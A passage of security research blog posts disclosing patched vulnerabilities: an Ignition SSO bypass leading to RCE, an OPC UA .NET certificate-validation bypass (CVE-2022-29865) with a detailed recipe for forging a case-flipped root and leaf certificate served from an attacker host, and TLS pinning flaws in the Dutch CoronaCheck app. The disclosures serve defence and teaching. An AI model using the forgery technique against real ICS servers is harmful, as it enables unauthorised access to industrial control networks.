In most cases, the Ignition server will not be exposed publicly to the internet, but only available on the internal ICS network. Therefore, this vulnerability would need to be combined with different vulnerabilities or attacks that grant us access to that network.
The fix
This vulnerability was addressed by Inductive Automation in versions 8.1.17 and 7.9.20 and assigned CVE-2022-35871. AD User Sources now disable the βSSO Enabledβ setting automatically, unless a specific flag is set on the server (-Dignition.enableInsecureAdSso=true). In other words, Inductive Automation has chosen to deprecate this feature and documented that it is dangerous to use. This may seem like a disappointing fix, but implementing a secure SSO protocol would likely have taken a lot more time. This way the vulnerability can be avoided and, if desired, Inductive Automation could implement a secure SSO protocol without time pressure.
Thoughts
When implementing security critical features (such as authentication), it is important to make a good design first. When authentication is combined with single sign-on and native applications this is even more important, as it can become very complex. With such a design, it becomes possible to catch mistakes before the features are implemented and to test each part separately.
While we of course don't know how this feature was built, we suspect no such design was created. Having a cryptographic protocol like Kerberos completely missing from the implementation should be quite obvious if the feature had been fully designed first.
Features allowing users to execute their own code on a server can be required in certain use-cases. However, the fact that this was available for a user who did not have any permissions or roles explicitly assigned to them is worrisome. This means that any authentication bypass immediately becomes an RCE vulnerability.
Conclusion
We've demonstrated a remote code execution vulnerability against Inductive Automation Ignition. We found that authentication can be bypassed on a server with AD single sign-on enabled. The (cryptographic) protocol for handling single sign-on appears to not be implemented at all.
After bypassing the authentication, we used functionality of the server to execute arbitrary Python code with SYSTEM privileges to set up a reverse shell.
Big shout-out to Inductive Automation on handling this year's edition of Pwn2Own! They published all details of all findings on their website, including an extensive write-up of their thoughts and fixes. Well done!
We thank Zero Day Initiative for organizing this year's edition of Pwn2Own Miami; we hope to return to a later edition!
This write-up is part 1 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for the Trusted Application Check Bypass in the OPC Foundation's OPC UA .NET Standard (CVE-2022-29865).
OPC UA is a communication protocol used in the ICS world. It is an open standard developed by the OPC Foundation. Because it is implemented by many vendors, it is often the preferred protocol for setting up communication between systems from different vendors in an ICS network.
The security for OPC UA connections can be configured in three different ways: without any security, with signing only, or with signing and encryption. In the latter two cases, both endpoints authenticate to each other using X.509 certificates. While these are the same type of certificates as used in TLS, the encryption protocol itself is custom and not based on TLS.
At Pwn2Own Miami 2022, four OPC UA servers were in scope, with three different "payload" options:
Denial-of-Service. Availability is everything in an ICS network, so being able to crash an OPC UA server can have significant impact.
Remote code execution. Being able to take over the server.
Bypass Trusted Application Check. Setting up a trusted connection to a server without having a valid certificate.
Of course, with a pre-authentication RCE it would be possible to modify the configuration of the server to change the security level and bypass the trusted application check that way, but this was not allowed.
OPC UA .NET Standard
We looked at potential trusted certificate bypasses in all four servers in scope, but found only one, in the OPC UA .NET Standard server. This server is used as a reference implementation for OPC UA in C# and is open source, meaning that this bypass could affect many ICS products that incorporate it as a library.
The core of the issue is in the function InternalValidate in CertificateValidator.cs. The logic for verifying a certificate here is quite complicated, which likely contributed to a bug like this being missed.
What we heard from the OPC Foundation is that the reason this check is so complicated is that they do not want to use the built-in certificate store of Windows. Instead, the certificates of the application can be managed by placing the certificate files in a specific directory on the server. The OPC UA specification has such a high level of detail that it even suggests how to store those certificates.
The core issue here is that two different certificate chains are built without verifying that they are equal. By crafting a chain in a very specific way, it is possible to make the server accept it, even though it is not signed by a trusted root.
862 protected virtual async Task InternalValidate(X509Certificate2Collection certificates, ConfiguredEndpoint endpoint)
863 {
864     X509Certificate2 certificate = certificates[0];
865
866     // check for previously validated certificate.
867     X509Certificate2 certificate2 = null;
868
869     if (m_validatedCertificates.TryGetValue(certificate.Thumbprint, out certificate2))
870     {
871         if (Utils.IsEqual(certificate2.RawData, certificate.RawData))
872         {
873             return;
874         }
875     }
876
877     CertificateIdentifier trustedCertificate = await GetTrustedCertificate(certificate).ConfigureAwait(false);
878
879     // get the issuers (checks the revocation lists if using directory stores).
880     List<CertificateIdentifier> issuers = new List<CertificateIdentifier>();
881     Dictionary<X509Certificate2, ServiceResultException> validationErrors = new Dictionary<X509Certificate2, ServiceResultException>();
882
883     bool isIssuerTrusted = await GetIssuersNoExceptionsOnGetIssuer(certificates, issuers, validationErrors).ConfigureAwait(false);
884
885     ServiceResult sresult = PopulateSresultWithValidationErrors(validationErrors);
886
887     // setup policy chain
888     X509ChainPolicy policy = new X509ChainPolicy();
889     policy.RevocationFlag = X509RevocationFlag.EntireChain;
890     policy.RevocationMode = X509RevocationMode.NoCheck;
891     policy.VerificationFlags = X509VerificationFlags.NoFlag;
892
893     foreach (CertificateIdentifier issuer in issuers)
894     {
895         if ((issuer.ValidationOptions & CertificateValidationOptions.SuppressRevocationStatusUnknown) != 0)
896         {
897             policy.VerificationFlags |= X509VerificationFlags.IgnoreCertificateAuthorityRevocationUnknown;
898             policy.VerificationFlags |= X509VerificationFlags.IgnoreCtlSignerRevocationUnknown;
899             policy.VerificationFlags |= X509VerificationFlags.IgnoreEndRevocationUnknown;
900             policy.VerificationFlags |= X509VerificationFlags.IgnoreRootRevocationUnknown;
901         }
902
903         // we did the revocation check in the GetIssuers call. No need here.
904         policy.RevocationMode = X509RevocationMode.NoCheck;
905         policy.ExtraStore.Add(issuer.Certificate);
906     }
907
908     // build chain.
909     using (X509Chain chain = new X509Chain())
910     {
911         chain.ChainPolicy = policy;
912         chain.Build(certificate);
913
914         // check the chain results.
915         CertificateIdentifier target = trustedCertificate;
916
917         if (target == null)
918         {
919             target = new CertificateIdentifier(certificate);
920         }
921
922         for (int ii = 0; ii < chain.ChainElements.Count; ii++)
923         {
924             X509ChainElement element = chain.ChainElements[ii];
925
926             CertificateIdentifier issuer = null;
927
928             if (ii < issuers.Count)
929             {
930                 issuer = issuers[ii];
931             }
932
933             // check for chain status errors.
934             if (element.ChainElementStatus.Length > 0)
935             {
936                 foreach (X509ChainStatus status in element.ChainElementStatus)
937                 {
938                     ServiceResult result = CheckChainStatus(status, target, issuer, (ii != 0));
939                     if (ServiceResult.IsBad(result))
940                     {
941                         sresult = new ServiceResult(result, sresult);
942                     }
943                 }
944             }
945
946             if (issuer != null)
947             {
948                 target = issuer;
949             }
950         }
951     }
952 [...]
First, on line 883, GetIssuersNoExceptionsOnGetIssuer is used to construct a certificate chain for the certificate to be validated (the out variable issuers). This function works in a loop. In each iteration, it attempts to find the issuer of the current certificate. For this it consults the following locations:
The list of trusted certificates stored on the server. If it is found in this list, the function will return true.
The list of issuer certificates stored on the server. These certificates are not explicitly trusted, but can be used to construct a chain to a trusted root.
The list of additional certificates sent by the client. Just like in TLS, it is possible to include additional certificates in the OPC UA handshake.
If an issuer is found, it becomes the current certificate and the loop continues until the current certificate is self-signed or an issuer cannot be found.
To find the issuer of a certificate, the function Match is used. This function compares the issuer name of the certificate with the subject name of each potential issuer. Additionally, the serial number or the subject key identifier must match. Note that the cryptographic signature is not yet considered at this stage, so the match is based only on forgeable certificate metadata.
The comparison of the names in Match is implemented in CompareDistinguishedName, but this implementation is unusual. This function decomposes the name into components and then does a case-insensitive match on each component. This is not how most implementations compare X.509 names.
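The difference between the two comparison styles can be illustrated with a minimal Python sketch. The function names below are ours and only model the behaviour described in this post (decompose, sort, compare case-insensitively versus compare literally). They are not the actual code of CompareDistinguishedName or of the .NET chain builder, and the plain comma split ignores escaping rules for distinguished names.

```python
def split_components(name: str) -> list[str]:
    """Split a distinguished name such as 'CN=Root, O=Example' into components.

    Simplification: a plain comma split, with no handling of escaped commas.
    """
    return [part.strip() for part in name.split(",") if part.strip()]


def loose_name_match(issuer: str, subject: str) -> bool:
    """Model of the unusual comparison: per component, sorted, case-insensitive."""
    a = sorted(c.casefold() for c in split_components(issuer))
    b = sorted(c.casefold() for c in split_components(subject))
    return a == b


def literal_name_match(issuer: str, subject: str) -> bool:
    """Model of a literal comparison: same components, same order, same case."""
    return split_components(issuer) == split_components(subject)


print(loose_name_match("CN=rOOT", "CN=Root"))    # True
print(literal_name_match("CN=rOOT", "CN=Root"))  # False
```

Two pieces of code that disagree on whether these names are equal can end up selecting different issuers for the same certificate.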
Next up, on line 912 an X509Chain object is used. The intent here appears to be to verify that the chain built using GetIssuersNoExceptionsOnGetIssuer is cryptographically valid. However, because it is not configured with the root certificates used by the application, it will often result in errors. Thus, on line 938, the function CheckChainStatus is used to ignore certain types of errors. For example, an UntrustedRoot error is ignored if it occurred for the certificate at the root.
The vulnerability that we found is that there is no verification that the certificate chain built by GetIssuersNoExceptionsOnGetIssuer and the one built by X509Chain.Build are equal. By abusing the unusual name comparison, it is possible to construct a certificate for which the two functions produce different chains. By making sure that the errors in the second chain only occur where CheckChainStatus ignores them, it is possible for this certificate to get accepted by the server.
The only prerequisite for this attack is that we know the subject name of one of the trusted root certificates and either its serial number or subject key identifier. Because certificates are not secret, these values should be easy to obtain in practice. During the demonstration, we ran the attack against a server which itself has a certificate issued by a trusted root certificate. That certificate gives us the metadata we need. In practice this should work quite often.
Example
Certificates
Suppose the server is configured to trust a certificate with the following details:
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 9891791597891487306 (0x8946b40ca084064a)
Signature Algorithm: sha1WithRSAEncryption
Issuer: CN=Root
Validity
Not Before: Feb 24 09:35:53 2022 GMT
Not After : Feb 24 09:35:53 2023 GMT
Subject: CN=Root
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
[...]
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
DirName:/CN=Root
serial:89:46:B4:0C:A0:84:06:4A
X509v3 Basic Constraints:
CA:TRUE
X509v3 Key Usage:
Certificate Sign, CRL Sign
Signature Algorithm: sha1WithRSAEncryption
[...]
And suppose that the OPC server itself is configured with the following certificate, issued from this root:
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
35:b3:1d:0a:27:cf:e3:94:25:b1:46:b8:35:47:07:1c:3a:54:0a:e8
Signature Algorithm: sha1WithRSAEncryption
Issuer: CN=Root
Validity
Not Before: Feb 24 09:35:53 2022 GMT
Not After : Mar 26 09:35:53 2022 GMT
Subject: CN=Quickstart Reference Server, C=US, ST=Arizona, O=OPC Foundation, DC=opcserver
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Modulus:
[...]
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
DirName:/CN=Root
serial:89:46:B4:0C:A0:84:06:4A
X509v3 Basic Constraints:
CA:FALSE
X509v3 Key Usage:
Digital Signature, Key Encipherment, Data Encipherment, Key Agreement
X509v3 Subject Alternative Name:
DNS:opcserver, URI:URI:urn:opcserver
Signature Algorithm: sha1WithRSAEncryption
[...]
Then the attacker can connect to the server to obtain this certificate and use the data in the Issuer and X509v3 Authority Key Identifier fields to craft two new certificates.
First of all, the attacker generates a new root certificate which uses the same common name as the trusted root certificate, but where each letter is flipped in case (i.e.: upper case to lower case and lower case to upper case). This certificate is self-signed and must contain the CA=TRUE basic constraint. The attacker makes this certificate available for download as a PEM file over HTTP on a webserver at the URL http://attacker/root.pem.
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
18:c6:c2:36:a6:97:b1:a8:10:4b:07:7c:4b:20:5e:f2:d0:8b:e0:a2
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=rOOT
Validity
Not Before: Feb 17 10:40:24 2022 GMT
Not After : May 25 10:40:24 2022 GMT
Subject: CN=rOOT
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (3072 bit)
Modulus:
[...]
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints:
CA:TRUE
X509v3 Key Usage:
Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
Signature Algorithm: sha256WithRSAEncryption
[...]
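Deriving the common name of the fake root is a one-liner. As a small sketch in Python (the helper name flip_case is ours):

```python
def flip_case(common_name: str) -> str:
    """Swap upper and lower case for every letter of the name."""
    return common_name.swapcase()


trusted_cn = "Root"
fake_cn = flip_case(trusted_cn)

print(fake_cn)                                      # rOOT
print(fake_cn == trusted_cn)                        # False: a literal comparison fails
print(fake_cn.casefold() == trusted_cn.casefold())  # True: a case-insensitive one succeeds
```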
Secondly, the attacker generates a new leaf certificate, signed using the previously created root. The following fields are added to this certificate:
The issuer contains the subject name of the fake root.
The X509v3 Authority Key Identifier extension contains a directory name of the fake root and a serial number of the real trusted root.
The certificate contains an Authority Information Access extension containing a CA Issuers field containing the URL where the fake root certificate PEM file can be downloaded.
All other fields, like the Subject and Subject Alternative Name fields, can contain any data the attacker may choose. To pass all further checks in InternalValidate, the validity time should contain the current time and the keyUsage field should contain Data Encipherment. A Subject Alternative Name extension could be added if the domain is checked.
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0e:4f:b8:ff:bd:d9:3a:fe:e7:0a:b2:eb:64:32:59:5e:ad:08:01:39
Signature Algorithm: sha256WithRSAEncryption
Issuer: CN=rOOT
Validity
Not Before: Feb 17 10:40:24 2022 GMT
Not After : May 25 10:40:24 2022 GMT
Subject: CN=FakeCert
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (3072 bit)
Modulus:
[...]
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
DirName:/CN=rOOT
serial:89:46:B4:0C:A0:84:06:4A
X509v3 Basic Constraints:
CA:FALSE
Authority Information Access:
CA Issuers - URI:http://attacker/root.pem
X509v3 Key Usage:
Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment, Key Agreement, Certificate Sign, CRL Sign
Signature Algorithm: sha256WithRSAEncryption
[...]
Verification
When the attacker connects with this CN=FakeCert certificate, the following will happen:
GetIssuersNoExceptionsOnGetIssuer will look in its trusted certificate store for the issuer of this certificate. To do this, it compares the Issuer name of the received certificate with the Subject name of the certificates in the store.
It does this check by decomposing the distinguished name, sorting the components, and then doing a case-insensitive match on each component.
So, it compares the common name of the issuer from the certificate:
CN=rOOT
with the common name of the subject of the trusted certificate:
CN=Root
In addition, it will compare the serial number of the root certificate with the serial number of the authority key identifier extension, which are equal:
Serial Number: 9891791597891487306 (0x8946b40ca084064a)
This function will therefore consider the CN=Root certificate a match. The signature could show that it is not correctly signed, but this is not checked yet. It will obtain a chain with one issuer and isIssuerTrusted will be true.
Then, it creates an X509Chain object and calls chain.Build(certificate). The return value of this call is ignored, and so is the overall status of the resulting chain. Only the statuses of the individual chain elements are checked.
As chain.Build does a literal comparison on the subject of the trusted root with the issuer of FakeCert, it will not consider the CN=Root certificate to be the issuer of FakeCert (because it looks for CN=rOOT). While the serial number from the Authority Key Identifier extension matches, this is not sufficient for a match.
Because it can't find the issuer certificate in its trust store, it will use the CA Issuers URL from the Authority Information Access extension to download the certificate from the webserver. With that, the result of the chain.Build() call will be a chain of two certificates, where the second one indicates the error UntrustedRoot. The function CheckChainStatus ignores this error code because it incorrectly assumes that the corresponding certificate was one of its trusted certificates, but it will in fact be the CN=rOOT certificate.
The remainder of the checks in InternalValidate will now succeed, because issuedByCA is true and isIssuerTrusted is true. The key usage, endpoint domain, use of SHA1 and minimum key size checks can be passed because the attacker has full control over the contents of FakeCert.
Our exploit can be seen in action in the video below:
Impact
With this vulnerability we could bypass the Trusted Application Check against the reference server that is included in the OPC UA .NET Standard repository. It would also be possible to bypass the check at the client side to impersonate a server.
In addition, OPC UA also has what is known as "User Authentication", which happens after the Trusted Application Check to establish a session. One of the options for User Authentication is by using an X.509 certificate, which could be bypassed in the same way too.
In practice, an OPC UA server would usually not be exposed to the public internet, so to exploit this issue an attacker would need to already have access to an internal ICS network. However, in rare cases where exposing an OPC UA server to the public internet would be unavoidable, enabling certificate authentication would be the most effective method for securing it. In that case, this check could be bypassed and it would be possible to gain access to the communication.
Once connected to an OPC UA server, the attacker would be able to read and write data, which could be used to disrupt the ICS processes that use this server.
The fix
The issues we found were fixed in the commit 51549f5ed846c8ac060add509c76ff4c0470f24d and assigned CVE-2022-29865. Names are now compared in the same manner as in other X.509 implementations: the comparison is no longer case-insensitive and the name components are no longer re-sorted. In addition, defensive checks were added to make sure that the two certificate chains that are used are equal.
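To illustrate the idea behind such a defensive check, here is a minimal Python sketch that compares two chains element by element using a hash over the full encoded certificate. This is not the code from the commit. The function names and the placeholder byte strings standing in for DER-encoded certificates are our own assumptions.

```python
import hashlib


def thumbprint(der: bytes) -> str:
    """SHA-256 over the complete encoded certificate."""
    return hashlib.sha256(der).hexdigest()


def chains_are_equal(chain_a: list[bytes], chain_b: list[bytes]) -> bool:
    """True only if both chains have the same certificates in the same order."""
    if len(chain_a) != len(chain_b):
        return False
    return all(thumbprint(a) == thumbprint(b) for a, b in zip(chain_a, chain_b))


# Placeholder bytes standing in for DER-encoded certificates (hypothetical data).
leaf = b"leaf-certificate"
trusted_root = b"trusted-root-certificate"
fake_root = b"attacker-root-certificate"

issuer_lookup_chain = [leaf, trusted_root]  # chain found by metadata matching
platform_chain = [leaf, fake_root]          # chain found by the platform builder

print(chains_are_equal(issuer_lookup_chain, platform_chain))  # False
```

With a check like this, the mismatch between the chain containing the trusted root and the chain containing the attacker's root would be detected before any error in the second chain is ignored.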
Thoughts
Certificate validation is tricky, as we have also demonstrated before in our post about the Dutch Corona-check app. These vulnerabilities actually bear some similarity, as both used a check for issuers based only on forgeable data. In this case, the cause is the desire to not use the Windows certificate store. We are unsure if this is truly the only way to implement this in .NET, as the CustomTrustStore property and TrustMode=CustomRootTrust setting on an X509ChainPolicy object appear to offer the required functionality without a dependence on the Windows certificate store.
The level of detail in the OPC UA specification regarding certificate validation is admirable. For example, it specifies clearly what errors should be used in what situations and there is even a chapter that suggests how to store the certificates on the server. However, there is a risk that over-specification of how a process like this should work leads to complex and non-idiomatic code. If the normal .NET API can no longer be applied directly as certain parts need to be re-implemented, this could create a large potential source for vulnerabilities.
Conclusion
We demonstrated a Trusted Application Check Bypass in OPC Foundation OPC UA .NET Standard. This can be used to set up a trusted connection to an OPC UA server. The cause of this vulnerability was the modification of the certificate validation procedure to use trusted roots stored in a custom location instead of the Windows certificate store, combined with an unusual name comparison. This made it possible to make our certificate appear to be signed by one of the trusted roots.
We thank Zero Day Initiative for organizing this year's edition of Pwn2Own Miami. We hope to return for a later edition!
During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or with a quick deadline for release, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we have found vulnerabilities in Zoom and Proctorio. This blog post will detail some vulnerabilities in the Dutch CoronaCheck app we found and reported. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.
Background
The CoronaCheck app can be used to generate a QR code proving that the user has received a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier, can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as "Testen voor Toegang". They may also be required for traveling to specific countries. The app used to generate the QR code is referred to in the codebase as the Holder app to distinguish it from the Verifier app. The source code of these apps is available on GitHub, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.
The Holder app:
The Verifier app:
The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.
Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS). This is because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are used right now and how to connect to them, and the Verifier app needs to know what keys to use to verify the signatures for that test provider. The privacy aspects of this design are quite good: the test provider only knows the user retrieved the result, but not where they are using it. VWS doesn't know who has done a test or their results and the Verifier only sees the limited personal information in the QR which is needed to check the identity of the holder. The downside of this is that blocking a specific person's QR code is difficult.
Strict requirements were formulated for the security of these connections in the design. See here (in Dutch). This includes the use of certificate pinning to check that the certificates are issued by a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must be signed. This uses the PKCS#7 Cryptographic Message Syntax (CMS) format.
Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, only one implicit check on the certificate (performed by App Transport Security) was still effective. This meant that there was no certificate pinning at all and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.
Certificate check issues
An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.
203 func checkSSL() {
204
205     guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
206         let serverTrust = challenge.protectionSpace.serverTrust else {
207
208         logDebug("No security strategy")
209         completionHandler(.performDefaultHandling, nil)
210         return
211     }
212
213     let policies = [SecPolicyCreateSSL(true, challenge.protectionSpace.host as CFString)]
214     SecTrustSetPolicies(serverTrust, policies as CFTypeRef)
215     let certificateCount = SecTrustGetCertificateCount(serverTrust)
216
217     var foundValidCertificate = false
218     var foundValidCommonNameEndsWithTrustedName = false
219     var foundValidFullyQualifiedDomainName = false
220
221     for index in 0 ..< certificateCount {
222
223         if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, index) {
224             let serverCert = Certificate(certificate: serverCertificate)
225
226             if let name = serverCert.commonName {
227                 if name.lowercased() == challenge.protectionSpace.host.lowercased() {
228                     foundValidFullyQualifiedDomainName = true
229                     logVerbose("Host matched CN \(name)")
230                 }
231                 for trustedName in trustedNames {
232                     if name.lowercased().hasSuffix(trustedName.lowercased()) {
233                         foundValidCommonNameEndsWithTrustedName = true
234                         logVerbose("Found a valid name \(name)")
235                     }
236                 }
237             }
238             if let san = openssl.getSubjectAlternativeName(serverCert.data), !foundValidFullyQualifiedDomainName {
239                 if compareSan(san, name: challenge.protectionSpace.host.lowercased()) {
240                     foundValidFullyQualifiedDomainName = true
241                     logVerbose("Host matched SAN \(san)")
242                 }
243             }
244             for trustedCertificate in trustedCertificates {
245
246                 if openssl.compare(serverCert.data, withTrustedCertificate: trustedCertificate) {
247                     logVerbose("Found a match with a trusted Certificate")
248                     foundValidCertificate = true
249                 }
250             }
251         }
252     }
253
254     if foundValidCertificate && foundValidCommonNameEndsWithTrustedName && foundValidFullyQualifiedDomainName {
255         // all good
256         logVerbose("Certificate signature is good for \(challenge.protectionSpace.host)")
257         completionHandler(.useCredential, URLCredential(trust: serverTrust))
258     } else {
259         logError("Invalid server trust")
260         completionHandler(.cancelAuthenticationChallenge, nil)
261     }
262 }
If an app wants to implement additional verification checks, then it is common to start with performing the platform's own certificate validation. This also means that the certificate chain is resolved. The certificates received from the server may be incomplete or contain additional certificates. By applying the platform verification, a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, but with the private root added as the only trust anchor.
This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the "continue with the usual validation" result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks were not additions to the verification, but replaced it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code for the validation was not checked, so an untrusted certificate was not rejected here.
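The difference between replacing and extending the platform validation can be modelled in a few lines of Python. This is a simplified sketch under our own assumptions: the enum mirrors the three dispositions mentioned above, the function names are ours, and App Transport Security is deliberately left out of the model.

```python
from enum import Enum


class Disposition(Enum):
    PERFORM_DEFAULT_HANDLING = "performDefaultHandling"
    USE_CREDENTIAL = "useCredential"
    CANCEL = "cancelAuthenticationChallenge"


def replacing_checks(extra_checks_pass: bool) -> Disposition:
    """Flawed flow: the app's own checks alone decide to accept the certificate."""
    return Disposition.USE_CREDENTIAL if extra_checks_pass else Disposition.CANCEL


def additive_checks(extra_checks_pass: bool) -> Disposition:
    """Additive flow: passing the extra checks hands over to platform validation."""
    if not extra_checks_pass:
        return Disposition.CANCEL
    return Disposition.PERFORM_DEFAULT_HANDLING


def connection_accepted(disposition: Disposition, platform_trust_ok: bool) -> bool:
    """Outcome of the challenge in this model (ignoring ATS)."""
    if disposition is Disposition.USE_CREDENTIAL:
        return True
    if disposition is Disposition.PERFORM_DEFAULT_HANDLING:
        return platform_trust_ok
    return False


# A certificate that passes the app's checks but is not trusted by the platform.
print(connection_accepted(replacing_checks(True), platform_trust_ok=False))  # True
print(connection_accepted(additive_checks(True), platform_trust_ok=False))   # False
```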
The app performs 3 additional checks on the certificate:
It is issued by one of a list of root certificates (line 246).
It contains a Subject Alternative Name containing a specific domain (line 238).
It contains a Common Name containing a specific domain (lines 227 and 232).
For checking the root certificate the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on what type of connection it is. Connections to the test providers are a bit more lenient, while the connection to the VWS servers itself needs to be issued by a specific root.
This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte-by-byte. Certificates are not very large, so this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those. This could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was based on two checks: comparing the serial number and comparing the "authority key information" extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the key of the certificate's issuer, but this can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combine this with the previous item and it is possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.
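The two approaches can be contrasted with a short Python sketch. The Cert class, its field names and the placeholder values are hypothetical and only stand in for parsed certificates. This is not the code used by the app.

```python
import hashlib
import hmac
from dataclasses import dataclass


@dataclass(frozen=True)
class Cert:
    der: bytes               # complete encoded certificate
    serial: int              # serial number (chosen by whoever creates the certificate)
    authority_key_id: bytes  # authority key field (also freely chosen)


def weak_compare(a: Cert, b: Cert) -> bool:
    """Metadata-only comparison, similar in spirit to the flawed check."""
    return a.serial == b.serial and a.authority_key_id == b.authority_key_id


def strong_compare(a: Cert, b: Cert) -> bool:
    """Compare a hash over the full certificate bytes."""
    digest_a = hashlib.sha256(a.der).digest()
    digest_b = hashlib.sha256(b.der).digest()
    return hmac.compare_digest(digest_a, digest_b)


pinned = Cert(der=b"pinned-root-bytes", serial=0x1234, authority_key_id=b"\x01\x02")
forged = Cert(der=b"attacker-root-bytes", serial=0x1234, authority_key_id=b"\x01\x02")

print(weak_compare(pinned, forged))    # True: the forged certificate is accepted
print(strong_compare(pinned, forged))  # False: the full contents differ
```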
This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.
ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was rejected by ATS. This meant we couldn't completely bypass the certificate validation. This could however still be exploitable in these scenarios:
A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store ("Staat der Nederlanden Private Root CA - G1"). To actually use that root would require an ATS exception.
A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.
Other issues
We found a number of other issues in the verification of certificates. These are of lower impact.
Subject Alternative Names
In the past, the Common Name field was used to indicate which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.
Obtaining the SANs from a certificate was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of name types other than a domain name, such as an email address in a certificate used for S/MIME. The parsing could be confused using specifically formatted email addresses to make it match any domain name.
func compareSan(_ san: String, name: String) -> Bool {

    let sanNames = san.split(separator: ",")
    for sanName in sanNames {
        // SanName can be like DNS: *.domain.nl
        let pattern = String(sanName)
            .replacingOccurrences(of: "DNS:", with: "", options: .caseInsensitive)
            .trimmingCharacters(in: .whitespacesAndNewlines)
        if wildcardMatch(name, pattern: pattern) {
            return true
        }
    }
    return false
}
For example, an S/MIME certificate containing the email address "a,*,b"@example.com (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.
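The confusion can be reproduced with a small Python model of this parsing. It is a sketch under assumptions: the exact textual form produced by OpenSSL for the email entry is assumed, and fnmatchcase is used as a stand-in for the app's wildcardMatch function, whose implementation is not shown here.

```python
import re
from fnmatch import fnmatchcase


def naive_compare_san(san: str, name: str) -> bool:
    """Model of the flawed parsing: split on commas, strip 'DNS:', wildcard match."""
    for san_name in san.split(","):
        pattern = re.sub("DNS:", "", san_name, flags=re.IGNORECASE).strip()
        if fnmatchcase(name, pattern):  # stand-in for wildcardMatch (assumption)
            return True
    return False


# Assumed textual representation of a SAN extension with only an email entry.
email_san = 'email:"a,*,b"@example.com'

# The comma split turns the quoted local part into a bare "*" pattern.
print(naive_compare_san(email_san, "coronacheck.nl"))  # True

# A regular DNS entry for another domain does not match.
print(naive_compare_san("DNS:*.example.nl, DNS:example.nl", "coronacheck.nl"))  # False
```

Reading the typed entries of the extension directly, instead of parsing its textual representation, avoids this class of confusion.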
CMS signatures
